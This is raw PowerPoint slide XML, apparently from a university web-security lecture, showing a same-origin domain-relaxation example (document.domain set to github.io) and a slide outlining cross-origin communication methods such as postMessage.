                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{668F2250-BB19-314D-8556-72AB6EB5E1C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0"/>
              <a:ext cx="15805532" cy="8452749"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="15805531" cy="8452748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rounded Rectangle">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED86E8D-5F58-FF4D-992B-17FAC07DD6C6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="15805531" cy="8452748"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 4020"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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>
                <a:outerShdw blurRad="50800" dist="25400" dir="3600000" rotWithShape="0">
                  <a:srgbClr val="000000">
                    <a:alpha val="70000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Shape">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2DB992-04D2-8041-AB4D-261E8159B1BF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="67726" y="38115"/>
                <a:ext cx="15670079" cy="178286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0" y="4117"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2980"/>
                      <a:pt x="52" y="1951"/>
                      <a:pt x="136" y="1206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="220" y="461"/>
                      <a:pt x="336" y="0"/>
                      <a:pt x="464" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21136" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21264" y="0"/>
                      <a:pt x="21380" y="461"/>
                      <a:pt x="21464" y="1206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21548" y="1951"/>
                      <a:pt x="21600" y="2980"/>
                      <a:pt x="21600" y="4117"/>
                    </a:cubicBez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DCDEE0"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="3900" b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1463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p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C9AB74D-9163-1242-AB92-F41A9547A68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7797" y="770587"/>
              <a:ext cx="1446117" cy="281529"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1446116" cy="281528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="Oval">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4AA0E68-B714-9149-9ADD-996CD2CC8F1C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1159158" y="155"/>
                <a:ext cx="287835" cy="279498"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="00882B"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="Oval">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C837A9BC-89A7-6C4A-AE11-1DE69457D86F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="579254" y="155"/>
                <a:ext cx="287835" cy="279498"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F5D328"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Oval">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FEDA93A-CD19-5543-8CF9-115D49E32CCA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-648" y="155"/>
                <a:ext cx="287835" cy="279498"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="C82506"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B10720-B012-4246-8C2B-EFC1DC5B59E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368043" y="218002"/>
              <a:ext cx="12651290" cy="1350113"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="12651289" cy="1350111"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Rectangle">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D871DC63-AD5F-7D49-8C8E-682A7D60E12C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1872" y="252065"/>
                <a:ext cx="12652044" cy="876610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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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  <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Image" descr="Image">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC2CE1FB-EBAC-A346-B786-0E4C84CE8BB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861276" y="408056"/>
                <a:ext cx="649043" cy="5705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400000"/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a14:hiddenLine>
                </a:ext>
              </a:extLst>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="http://example.com">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A502AB17-115F-F248-A6C3-F3957BBBA51C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="226703" y="-2025"/>
                <a:ext cx="10899636" cy="135091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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle>
                <a:lvl1pPr algn="l" defTabSz="584200">
                  <a:defRPr sz="1000" b="0">
                    <a:solidFill>
                      <a:srgbClr val="A6AAA9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>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr sz="375">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>http://example.com</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Frame: stanford.edu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE98470A-5F16-F640-80CC-EE2E1C0017FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="3165476"/>
            <a:ext cx="5151438" cy="728663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:defRPr sz="540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r>
              <a:rPr lang="en-US" sz="2025" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2025" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Frame: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>github.io</a:t>
            </a:r>
            <a:endParaRPr sz="2025" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="cs155.stanford.edu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91571BE6-236D-D34C-88F3-0F168995345F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4033243" y="2376372"/>
            <a:ext cx="1941237" cy="373179"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5800" u="sng">
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2175" dirty="0"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cs5435.github.io</a:t>
            </a:r>
            <a:endParaRPr sz="2175" dirty="0">
              <a:hlinkClick r:id="" action="ppaction://noaction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35" name="&lt;script&gt;…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{303B82F7-5536-E943-97DF-B5C4AEE827E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3432175" y="4175024"/>
            <a:ext cx="4547720" cy="973343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2025" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2025" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2025" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2025" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2025" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>io</a:t>
            </a:r>
            <a:endParaRPr sz="2025" dirty="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2025" dirty="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4222723699"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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1" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{712827DE-6171-6444-8FD0-551D2290226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ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Cross-Origin Communication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92162" name="Content Placeholder 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D66C6FB-766C-594E-8247-102C3C7B196B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066800" y="2103120"/>
            <a:ext cx="5532436" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Cross-origin network requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Cross-origin client-side communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>postMessage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Client-side messaging via fragment navigation (obsolete)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB2AB7B-094D-1B45-8932-7C5E277CFB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73276" y="2079626"/>
            <a:ext cx="8069263" cy="402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4290" tIns="34290" rIns="34290" bIns="34290" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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296863" indent="-296863">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr kumimoji="1"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•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lvl="1">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167941" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{800E2BC5-2109-5F42-8322-15F9AFF0E60F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8278905" y="3763875"/>
            <a:ext cx="1439863" cy="1165225"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92165" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50D5097C-F802-394C-916C-8E64D26F50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1805" y="2528799"/>
            <a:ext cx="936625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66" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366A4048-6F89-134A-9479-0523958B84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4567" y="2495462"/>
            <a:ext cx="938212" cy="582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895" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04A78332-6A49-D64E-AFCF-198CFD2BBCF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10499817" y="2236313"/>
            <a:ext cx="537006" cy="27699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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37896" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{830901BE-D3BC-0444-9534-8E64EF0B0226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8715468" y="2282351"/>
            <a:ext cx="557845" cy="27699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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167946" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C418C389-EA42-0B4B-B084-776E1836453D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9993404" y="3763874"/>
            <a:ext cx="1371600" cy="1149350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92170" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9F56B56-3714-4A48-AFA8-0EEA170EF7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1804" y="3832137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171" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{138B1EFA-2D7A-144D-8F4C-1957B1C33D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8347167" y="4640582"/>
            <a:ext cx="132889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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="+mn-lt"/>
